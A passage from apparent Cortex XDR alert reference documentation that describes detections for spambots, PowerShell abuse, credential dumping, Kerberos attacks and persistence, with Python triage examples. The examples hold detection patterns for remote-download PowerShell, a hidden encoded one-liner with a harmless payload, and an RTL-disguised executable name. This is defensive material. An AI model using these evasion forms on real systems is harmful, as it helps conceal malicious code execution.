addresses are only receiving connections from a few specific endpoints in the organization, these scripts
may be an indicator of more suspicious activity. Security testers and adversaries use offensive frameworks
that employ forms of scripting which result in this type of network activity.

Attacker's Goals
Connect to its command and control server.

Investigative Actions
• Check the external host the script connects to.
• Fetch and investigate the executed script.

Spam Bot Traffic
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 3 Days

Deduplication Period 3 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Impact (TA0040)

ATT&CK Technique Resource Hijacking (T1496)

Severity Low

Description
The endpoint connected to an excessive number of external SMTP servers. A spambot may be trying to
send spam email using multiple SMTP servers. Spambots can cause your domain to be blacklisted, and can
contain other malicious functionality. The same mechanism can also be used for exfiltration, and some VPN
clients can tunnel data over SMTP. Note: this detection model looks for SMTP connections to external
servers; the volume of traffic is not considered. The count is based on the number of distinct domains
being contacted plus the number of unresolved IP addresses.

Attacker's Goals
The attacker uses the host as an SMTP client to send mail while hiding its real origin.

Investigative Actions
• Verify that the source is not an SMTP server. If Cortex XDR Analytics has failed to identify the process
as a valid SMTP server, this alert will be a false positive.
• Verify that IP addresses are actually not being resolved by the non-SMTP process. If the process is
performing DNS resolution with a DNS service outside your network, it is possible (depending on your
network topology) that Cortex XDR Analytics will not observe that traffic. Because SMTP services
typically use numerous IP addresses, this situation could cause a process to exceed a limit when it would
otherwise fail to do so.
• If the SMTP connection activity proves to be the result of malicious file activity, search in the Triage
page for other endpoints infected with the file.
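The counting rule described above, as an added example that is not Cortex XDR code: for every (endpoint, process) pair, count the distinct external SMTP destinations seen inside the 3-day test period, where a destination is its resolved domain when one exists and the bare IP otherwise, skip processes that are known mail servers (the first investigative action), and alert once the count exceeds a limit. The connection records, the limit of 10, the list of known SMTP server process names and the host and process names are all constructed for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple, Optional


class SmtpConnection(NamedTuple):
    """One outbound SMTP connection as an agent or firewall would report it (constructed)."""
    ts: datetime
    host: str                 # source endpoint
    process: str              # process that opened the connection
    dst_ip: str
    dst_domain: Optional[str]  # resolved name, or None when the IP never resolved


# Assumed list of processes that legitimately talk to many MX hosts; counting them
# would be a false positive, which is what the first investigative action checks.
KNOWN_SMTP_SERVERS = {"postfix", "sendmail", "exim4", "edgetransport.exe"}
TEST_WINDOW = timedelta(days=3)         # the alert's test period
DISTINCT_DESTINATION_LIMIT = 10         # constructed threshold, not the product's value


def destination_key(conn):
    """Domains are counted by name; unresolved IPs are counted individually."""
    return ("domain", conn.dst_domain) if conn.dst_domain else ("ip", conn.dst_ip)


def detect_spambots(conns, limit=DISTINCT_DESTINATION_LIMIT, window=TEST_WINDOW):
    """Return {(host, process): details} for clients exceeding `limit` distinct
    destinations inside any sliding window of length `window`."""
    by_client = defaultdict(list)
    for c in conns:
        if c.process.lower() in KNOWN_SMTP_SERVERS:
            continue
        by_client[(c.host, c.process)].append(c)

    alerts = {}
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r.ts)
        start = 0
        for end, rec in enumerate(recs):
            while rec.ts - recs[start].ts > window:
                start += 1                      # slide the window forward
            dests = {destination_key(r) for r in recs[start:end + 1]}
            if len(dests) > limit:
                alerts[client] = {
                    "distinct_destinations": len(dests),
                    "unresolved_ips": sum(1 for kind, _ in dests if kind == "ip"),
                    "window_start": recs[start].ts,
                    "window_end": rec.ts,
                }
                break
    return alerts


def constructed_sample():
    """Constructed traffic: one noisy unknown process, a real mail server, a normal
    client, and a slow process whose destinations never fit one window."""
    t0 = datetime(2021, 7, 1, 9, 0)
    conns = []
    for i in range(12):   # 8 resolved domains + 4 unresolved IPs within 11 hours
        conns.append(SmtpConnection(t0 + timedelta(hours=i), "ws-17", "updater.exe",
                                    f"203.0.113.{i + 1}", f"mx{i}.example.net" if i < 8 else None))
    for i in range(40):   # postfix talking to 40 MX hosts: excluded as a known server
        conns.append(SmtpConnection(t0 + timedelta(minutes=i), "mail-01", "postfix",
                                    f"198.51.100.{i + 1}", f"mx{i}.example.org"))
    for i in range(20):   # ordinary mail client, one relay
        conns.append(SmtpConnection(t0 + timedelta(hours=i), "ws-03", "outlook.exe",
                                    "192.0.2.10", "smtp.example.com"))
    for i in range(11):   # 11 destinations spread over 20 days: never > limit per window
        conns.append(SmtpConnection(t0 + timedelta(days=2 * i), "ws-09", "sync.exe",
                                    f"203.0.113.{100 + i}", None))
    return conns


def run_example():
    return detect_spambots(constructed_sample())


if __name__ == "__main__":
    for client, info in run_example().items():
        print(client, info)
```

Because unresolved IPs count one by one, a process that resolves names through a resolver the sensor cannot see will look noisier than it is; that is the situation the second investigative action asks you to rule out.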

Sudoedit Brute force attempt
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: 1 Hour
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Privilege Escalation (TA0004)
ATT&CK Technique: Exploitation for Privilege Escalation (T1068)
Severity: Medium

Description
An unusual number of sudoedit commands was executed in a short period of time. This may indicate an
attempt to exploit CVE-2021-3156.

Attacker's Goals
The attacker may gain higher privileges via exploitation of sudoedit.

Investigative Actions
• Verify that the current version of sudo is not vulnerable to CVE-2021-3156.

Suspicious PowerShell Command Line
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Execution (TA0002)
ATT&CK Technique: Command and Scripting Interpreter: PowerShell (T1059.001)
Severity: Low

Description
Attackers often leverage PowerShell one-liners, in which PowerShell is executed with suspicious options on
the command line.

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it. For
example, the command line may be an administrative script.
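A triage helper for the investigative action above, added here as an example and not part of Cortex XDR: it resolves the short parameter forms powershell.exe accepts (such as -nop, -w, -enc), records which suspicious options were used, and decodes an -EncodedCommand value (base64 of UTF-16LE text) so the analyst can read what would actually run. The parameter table, the body patterns and both sample command lines are constructed; the encoded sample is a harmless Write-Output.

```python
import base64
import re

# powershell.exe parameters that matter for triage, with the reason an analyst cares.
PARAMS = {
    "encodedcommand": "script body passed base64-encoded (UTF-16LE) on the command line",
    "noprofile": "profile skipped, typical of automated one-liners",
    "noninteractive": "interactive prompts suppressed",
    "windowstyle": "console window style overridden",
    "executionpolicy": "execution policy overridden for this process",
}
# Short forms powershell.exe accepts; any unambiguous prefix of a name also works.
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand", "enc": "encodedcommand",
           "nop": "noprofile", "noni": "noninteractive", "w": "windowstyle",
           "ep": "executionpolicy", "ex": "executionpolicy"}
# Script-body constructs worth a look whatever options were used (constructed list).
BODY_PATTERNS = [
    (r"\bIEX\b|Invoke-Expression", "Invoke-Expression on dynamically built text"),
    (r"DownloadString|DownloadFile", "remote content fetched via WebClient"),
    (r"FromBase64String", "nested base64 layer"),
]


def canonical_param(token):
    """Map '-nop', '/NoProfile', '-NoP' ... to the full parameter name, or None."""
    name = token.lstrip("-/").lower()
    if name in ALIASES:
        return ALIASES[name]
    matches = [p for p in PARAMS if p.startswith(name)]
    return matches[0] if len(matches) == 1 else None


def decode_encoded_command(value):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except ValueError:          # binascii.Error and UnicodeDecodeError both derive from it
        return None


def triage_command_line(cmdline):
    """Return the suspicious options found and the decoded script body, if any."""
    tokens = cmdline.split()    # whitespace split; a production parser must honour quoting
    findings, decoded = [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith(("-", "/")):
            param = canonical_param(tok)
            value = tokens[i + 1] if i + 1 < len(tokens) else ""
            if param == "encodedcommand":
                decoded = decode_encoded_command(value)
                findings.append("encodedcommand")
                i += 1                                   # consume the value token
            elif param == "windowstyle":
                if value.lower() in ("hidden", "h"):
                    findings.append("windowstyle=hidden")
                i += 1
            elif param == "executionpolicy":
                findings.append(f"executionpolicy={value.lower()}")
                i += 1
            elif param in ("noprofile", "noninteractive"):
                findings.append(param)
        i += 1
    body = decoded if decoded is not None else cmdline
    for pattern, label in BODY_PATTERNS:
        if re.search(pattern, body, re.IGNORECASE):
            findings.append(label)
    return {"findings": findings, "decoded": decoded}


def constructed_samples():
    """Two constructed command lines: an admin script and a hidden encoded one-liner."""
    encoded = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode("ascii")
    return {
        "benign": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
        "suspicious": f"powershell.exe -nop -w hidden -enc {encoded}",
    }


if __name__ == "__main__":
    for name, cmd in constructed_samples().items():
        print(name, triage_command_line(cmd))
```

The benign sample still reports -NoProfile, which is why the page asks you to judge the findings against what is normal for that host and user rather than treating any single option as malicious.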

Suspicious PowerShell Enumeration of Running Processes
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Discovery (TA0007)
ATT&CK Technique: Process Discovery (T1057)
Severity: Low

Description
Attackers often enumerate running processes to find and disable security tools.

Attacker's Goals
Understand the type of host according to the processes running on it; find and disable security tools.

Investigative Actions
Verify whether the command that was executed is benign or normal for the host and/or user performing it
(for example, it may be an IT script).

Suspicious Process Spawned by Adobe Reader
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Initial Access (TA0001)
ATT&CK Technique: Phishing: Spearphishing Attachment (T1566.001)
Severity: Low

Description
An unusual process was spawned by Adobe Reader with an uncommon command line.

Attacker's Goals
An attacker attempts to gain code execution via a phishing document.

Investigative Actions
• Check the source of the document (received by mail or loaded locally).
• Investigate the child processes for malicious activity and network connections to an external host.

Suspicious Process Spawned by wininit.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Defense Evasion (TA0005)
ATT&CK Technique: Masquerading (T1036)
Severity: Medium

Description
An unusual process was spawned by wininit.exe, possibly indicating malicious local or remote code
execution.

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

Suspicious RunOnce Parent Process
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Persistence (TA0003)
ATT&CK Technique: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
Severity: Low

Description
Runonce.exe executes commands under the Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,
typically on computer boot and user login events.

Attacker's Goals
An attacker is trying to perform an action on the system at a later point, achieving persistence.

Investigative Actions
Investigate the endpoint to determine if it's a legitimate process that is supposed to use RunOnce in its
operation.

Suspicious SSO access from ASN
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: Cortex XDR can raise this alert from the following combination of data sources: AzureAD, Okta, or PingOne
Required Detection Modules: Identity Analytics
ATT&CK Tactic: Initial Access (TA0001)
ATT&CK Technique: Valid Accounts: Domain Accounts (T1078.002)
Severity: Low

Description
A suspicious SSO authentication attempt was made by a user.

Attacker's Goals
Use an account that was possibly compromised to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user has switched locations and providers).
• Verify if the ASN is an approved ASN to authenticate from.
• Follow further actions done by the user.

Suspicious disablement of the Windows Firewall
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 7 Days
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Defense Evasion (TA0005)
ATT&CK Technique: Impair Defenses: Disable or Modify System Firewall (T1562.004)
Severity: Medium

Description
The Windows Firewall has been disabled. Malware may turn it off to exfiltrate data and communicate with
C2 servers.

Attacker's Goals
An attacker may turn the firewall off to exfiltrate data and communicate with C2 servers.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Investigate the endpoint to determine if the process is legitimately disabling the firewall.

Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Credential Access (TA0006)
ATT&CK Technique: OS Credential Dumping: NTDS (T1003.003)
Severity: High

Description
Attackers may attempt to dump the ntds.dit file, which stores all Active Directory account information, to
later extract passwords and hashes from it.

Attacker's Goals
Retrieve Active Directory data, to perform malicious activities such as lateral movement.

Investigative Actions
Check the initiator process for additional suspicious activity.

Suspicious process accessed a site masquerading as Google
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: Cortex XDR can raise this alert from the following combinations of data sources:
• Palo Alto Networks Firewall Logs
• XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic:
• Command and Control (TA0011)
• Defense Evasion (TA0005)
ATT&CK Technique:
• Web Service: Bidirectional Communication (T1102.002)
• Masquerading (T1036)
Severity: Low

Description
A suspicious process accessed a site masquerading as Google.

Attacker's Goals
Masquerade as legitimate-looking Google services for defense evasion and C&C.

Investigative Actions
• See whether this site has a malicious reputation.
• Follow process activities.
• Monitor traffic to the site.

Suspicious process execution by scheduled task
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 10 Days
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Persistence (TA0003)
ATT&CK Technique: Scheduled Task/Job (T1053)
Severity: Low

Description
An unpopular (low-prevalence) unsigned process was executed by a scheduled task.

Attacker's Goals
Attackers may attempt to gain persistence on the endpoint using scheduled tasks.

Investigative Actions
• Review the process executed by the scheduled task.
• Investigate the specific scheduled task execution chain.

TGT reuse from different hosts (pass the ticket)
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: 10 Hours
Deduplication Period: 1 Day
Required Data: Cortex XDR can raise this alert from the following combination of data sources: Palo Alto Networks Firewall Logs or XDR Agent
Required Detection Modules: Identity Analytics
ATT&CK Tactic: Lateral Movement (TA0008)
ATT&CK Technique: Use Alternate Authentication Material: Pass the Ticket (T1550.003)
Severity: Low

Description
Two different hosts were observed sending TGS requests with the same TGT. This may indicate that the TGT
was stolen from one host and passed to another.

Attacker's Goals
Lateral movement using stolen user-account credentials.

Investigative Actions
Check that the two hosts are in fact different machines, and investigate whether the ticket was stolen from one of them.

UNIX LOLBIN connecting to a rare host
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 6 Hours
Required Data: Cortex XDR can raise this alert from the following combinations of data sources:
• Palo Alto Networks Firewall Logs
• XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Command and Control (TA0011)
ATT&CK Technique: Application Layer Protocol (T1071)
Severity: Informational

Description
A UNIX LOLBIN connected to an external IP address or host, which is rarely connected to from the
organization.

Attacker's Goals
Beacon to C2 server and/or exfiltrate data.

Investigative Actions
Check whether the process was injected into or otherwise subverted for malicious use.

Uncommon ARP cache listing via arp.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Discovery (TA0007)
ATT&CK Technique: System Network Configuration Discovery (T1016)
Severity: Low

Description
The arp.exe command is used to display and modify entries in the Address Resolution Protocol (ARP) cache.
Adversaries may attempt to use the command to discover remote systems they could compromise.

Attacker's Goals
Adversaries may attempt to use the command to discover remote systems they could compromise.

Investigative Actions
Check whether the initiating process is allowed in your organization (if the parent process is cmd.exe, check
the process that spawned it).

Uncommon IP Configuration Listing via ipconfig.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Discovery (TA0007)
ATT&CK Technique: System Network Configuration Discovery (T1016)
Severity: Low

Description
The 'ipconfig' command is used to display TCP/IP network configuration information and refresh the
Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings. Adversaries may
use the command to discover network configuration details.

Attacker's Goals
Attackers can use the ipconfig command to discover network configuration details.

Investigative Actions
• Check whether the initiator process is benign or normal for the host and/or user performing it.
• Check whether additional discovery commands were executed from the same process.

Uncommon Service Create/Config
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Execution (TA0002)
ATT&CK Technique: System Services: Service Execution (T1569.002)
Severity: Medium

Description
The Service Control command (sc.exe) is used to create, start, stop, query, or delete Windows services.
Adversaries may attempt to use the command to execute and persist a binary, command, or script.

Attacker's Goals
Evading security controls and possibly persisting malware.

Investigative Actions
Check whether the service created, or the configuration change to an existing service, is benign or normal
for the host and/or user performing it.

Uncommon local scheduled task creation via schtasks.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Persistence (TA0003)
ATT&CK Technique: Scheduled Task/Job (T1053)
Severity: Low

Description
The schtasks.exe command enables creating, deleting, querying, changing, running, and ending scheduled
tasks on a local or remote computer. Adversaries may attempt to use the command to gain persistence on
this host using scheduled tasks.

Attacker's Goals
Attackers may attempt to use the command to gain persistence on the endpoint using scheduled tasks.

Investigative Actions
• Review the process that creates the scheduled task.
• Investigate the specific scheduled task execution chain.

Uncommon net group execution
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 6 Hours
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Discovery (TA0007)
ATT&CK Technique: Permission Groups Discovery (T1069)
Severity: Medium

Description
The 'net group' command is used to add, display, or modify domain-level groups. Adversaries may attempt
to use the command to find domain-level groups and permissions settings or modify domain-level group
memberships.

Attacker's Goals
Attackers may attempt to use the command to find domain-level groups and permissions settings or modify
domain-level group memberships.

Investigative Actions
• Check if the queried group is a sensitive one (e.g. administrators).
• Check whether the initiating process has executed additional discovery commands.

Uncommon remote scheduled task creation
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Execution (TA0002)
ATT&CK Technique: Scheduled Task/Job (T1053)
Severity: High

Description
The schtasks.exe command enables creating, deleting, querying, changing, running, and ending scheduled
tasks on a local or remote computer. Adversaries may attempt to use the command to execute programs or
persist malware on remote machines.

Attacker's Goals
Attackers can attempt to use the command to execute programs or persist malware on remote endpoints.

Investigative Actions
• Investigate the initiator process and whether it should create remote tasks.
• Investigate the scheduled task execution on the remote machine.

Uncommon remote service start via sc.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Execution (TA0002)
ATT&CK Technique: System Services: Service Execution (T1569.002)
Severity: Low

Description
The Service Control command (sc.exe) is used to create, start, stop, query, or delete Windows services.
Adversaries may attempt to use the command to execute and persist a binary, command, or script.

Attacker's Goals
The Service Control command is used to create, start, stop, query, or delete Windows services. Attackers
can use the command to attempt to execute and persist a binary, command, or script.

Investigative Actions
• Check whether the executed process is benign and if this was desired behavior as part of its normal
execution flow.
• Check the remote host for any evidence of the executed service and investigate it.

Uncommon routing table listing via route.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Discovery (TA0007)
ATT&CK Technique: System Network Configuration Discovery (T1016)
Severity: Low

Description
The route.exe command is used to display and modify entries in the local IP routing table. Adversaries may
attempt to use the command to discover remote systems they could compromise.

Attacker's Goals
Attackers can attempt to use the command to discover remote systems they could compromise.

Investigative Actions
Check whether the command line executed is benign or normal for the host and/or user performing it (e.g.
an IT script).

Uncommon user management via net.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic:
• Discovery (TA0007)
• Persistence (TA0003)
ATT&CK Technique:
• Account Discovery (T1087)
• Create Account (T1136)
Severity: Low

Description
The net.exe command is used to add, delete, and otherwise manage the users on a computer. Adversaries
may attempt to use the command to discover or add local and domain user accounts.

Attacker's Goals
Attackers may attempt to use the command to discover or add local and domain user accounts. The created
accounts are used to gain additional access to endpoints within your network.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Check whether the user in the command line is an administrator or other sensitive account.

Unicode RTL Override Character
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Defense Evasion (TA0005)
ATT&CK Technique: Obfuscated Files or Information (T1027)
Severity: Medium

Description
An attacker may use a special right-to-left (RTL) override character to trick users into executing malicious
files that look like benign file types.

Attacker's Goals
Trick users into executing malicious files by making their file types seem benign.

Investigative Actions
Investigate the executed process causality group. There is no reason for benign files to contain the Unicode
right-to-left override character in their name.
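A filename check for this alert, added as an example and not Cortex XDR code: it lists every Unicode directional formatting character in a process image name, approximates how a file manager would render the name (text after a right-to-left override is displayed reversed until a pop-directional-formatting character or the end), and reports when the displayed extension differs from the real one. It covers all nine bidi control characters, not only U+202E, which goes beyond the alert text; the sample names are constructed.

```python
import unicodedata

# Bidi classes of the directional formatting characters U+202A..U+202E and U+2066..U+2069.
BIDI_CONTROL_CLASSES = {"LRE", "RLE", "LRO", "RLO", "PDF", "LRI", "RLI", "FSI", "PDI"}
RLO, PDF = "\u202e", "\u202c"


def find_bidi_controls(name):
    """Positions and names of directional controls in `name`.
    Ordinary right-to-left letters (Hebrew, Arabic) are class R/AL and are not listed."""
    return [(i, f"U+{ord(ch):04X}", unicodedata.name(ch))
            for i, ch in enumerate(name)
            if unicodedata.bidirectional(ch) in BIDI_CONTROL_CLASSES]


def rendered_name(name):
    """Approximate visual rendering: the run after an RLO is shown reversed until a
    PDF or the end of the string; other controls are invisible and dropped.
    This is a simplification of the bidi algorithm, sufficient for file names."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            stop = len(name) if end == -1 else end
            out.append(name[i + 1:stop][::-1])
            i = stop + 1
        elif unicodedata.bidirectional(ch) in BIDI_CONTROL_CLASSES:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def extension(name):
    _, sep, ext = name.rpartition(".")
    return ext.lower() if sep else ""


def inspect_filename(name):
    """Triage record for one file name as seen in a process-start event."""
    controls = find_bidi_controls(name)
    shown = rendered_name(name)
    return {
        "has_bidi_control": bool(controls),
        "controls": controls,
        "displayed_as": shown,
        "actual_extension": extension(name),
        "displayed_extension": extension(shown),
        "extension_mismatch": extension(name) != extension(shown),
    }


def constructed_samples():
    """Constructed names: a disguised executable, a plain PDF, and a benign Hebrew name."""
    return ["invoice\u202efdp.exe", "report.pdf", "\u05e9\u05dc\u05d5\u05dd.txt"]


if __name__ == "__main__":
    for n in constructed_samples():
        print(inspect_filename(n))
```

The Hebrew sample shows why the check keys on control characters rather than on right-to-left text in general: legitimate names in RTL scripts contain no formatting controls and must not fire.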

Unusual Lolbins Process Spawned by InstallUtil.exe
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Defense Evasion (TA0005)
ATT&CK Technique: Signed Binary Proxy Execution: InstallUtil (T1218.004)
Severity: Low

Description
An unusual process was spawned by InstallUtil.exe, possibly indicating malicious local or remote code
execution.

Attacker's Goals
Gain code execution on the host.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.

Unusual process accessed the PowerShell history file
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Execution (TA0002)
ATT&CK Technique: Command and Scripting Interpreter: PowerShell (T1059.001)
Severity: Low

Description
An abnormal process accessed the PowerShell console history file. This may be a sign of malicious
PowerShell execution without directly invoking the powershell.exe binary.

Attacker's Goals
An attacker is attempting to run PowerShell without powershell.exe to evade detection.

Investigative Actions
• Investigate the process and command line executed and whether it's benign or normal for this host.

Unusual weak authentication by user
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Day
Required Data: XDR Agent
Required Detection Modules: Identity Analytics
ATT&CK Tactic: Lateral Movement (TA0008)
ATT&CK Technique: Use Alternate Authentication Material (T1550)
Severity: Informational

Description
A user account authenticated to a host via NTLMv1 or LM authentication for the first time in the past 30
days. This may indicate an NTLM downgrade attack, in which the client is forced to authenticate with a
weaker hash or protocol (such as NTLMv1 or even LM) instead of NTLMv2.

Attacker's Goals
The attacker attempts to gain access to the accounts.

Investigative Actions
• Audit all login events with a weaker protocol and review any anomalous usage.

Unverified domain added to Azure AD
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 1 Hour
Required Data: Azure Audit Log
Required Detection Modules: No module required
ATT&CK Tactic: Persistence (TA0003)
ATT&CK Technique: Account Manipulation: Additional Cloud Credentials (T1098.001)
Severity: Low

Description
A new unverified domain has been added to Azure AD.

Attacker's Goals
An attacker attempts to change Active Directory configuration for persistence or defense evasion.

Investigative Actions
• Check if the new domain is known for the organization.
• Check whether the user changing the configuration is permitted.

User attempted to connect from a suspicious country
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 30 Days
Required Data: Cortex XDR can raise this alert from the following combinations of data sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
Required Detection Modules: Identity Analytics
ATT&CK Tactic:
• Credential Access (TA0006)
• Resource Development (TA0042)
ATT&CK Technique:
• Compromise Accounts (T1586)
• Brute Force: Password Guessing (T1110.001)
Severity: Informational

Description
A user connected from an unusual country. This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed their traffic there via a VPN.

User connected from a new country
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 30 Days
Required Data: Cortex XDR can raise this alert from the following combinations of data sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
Required Detection Modules: Identity Analytics
ATT&CK Tactic:
• Credential Access (TA0006)
• Resource Development (TA0042)
ATT&CK Technique:
• Compromise Accounts (T1586)
• Brute Force: Password Guessing (T1110.001)
Severity: Informational

Description
A user connected from an unusual country that the user has not connected from before. This may indicate
the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed their traffic there via a VPN.

User successfully connected from a suspicious country
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 30 Days
Required Data: Cortex XDR can raise this alert from the following combinations of data sources:
• AzureAD, Okta, or PingOne
• XDR Agent, AzureAD, or Okta
For increased accuracy, you can also add the following optional data source: Palo Alto Networks Firewall Logs
Required Detection Modules: Identity Analytics
ATT&CK Tactic: Initial Access (TA0001)
ATT&CK Technique: Valid Accounts (T1078)
Severity: Low

Description
A user successfully connected from an unusual country. This may indicate the account was compromised.

Attacker's Goals
Gain user-account credentials.

Investigative Actions
Check if the user is currently located in the aforementioned country, or routed their traffic there via a VPN.

Vulnerable driver loaded
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 7 Days
Required Data: XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Privilege Escalation (TA0004)
ATT&CK Technique: Exploitation for Privilege Escalation (T1068)
Severity: Medium

Description
A new and uncommon vulnerable driver was loaded. Attackers may install a legitimate but vulnerable kernel
driver and exploit its vulnerability to gain kernel access.

Attacker's Goals
Gain code execution on the host kernel.

Investigative Actions
• Check whether the driver was installed by IT or by the user.
• Check whether the host actually has the hardware the driver is for (for example, a Lenovo driver loaded
on an Asus PC is suspicious).
• Check the driver file's creation time and whether legitimate operations occurred at that time.

Weakly-Encrypted Kerberos Ticket Requested
Synopsis
Learning Period: 14 Days
Training Period: 30 Days
Test Period: N/A (single event)
Deduplication Period: 30 Days
Required Data: Cortex XDR can raise this alert from the following combination of data sources: Palo Alto Networks Firewall Logs or XDR Agent
Required Detection Modules: No module required
ATT&CK Tactic: Credential Access (TA0006)
ATT&CK Technique: Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003)
Severity: Low

Description
A user specifically requested weak and deprecated encryption in a Kerberos TGS request. This provides
easy-to-crack hashes, and is typically a sign of a Kerberoasting attack.

Attacker's Goals
Crack account credentials by obtaining an easy-to-crack Kerberos ticket.

Investigative Actions
Check who used the host at the time of the alert, to rule out a benign service or tool requesting weak
Kerberos encryption.
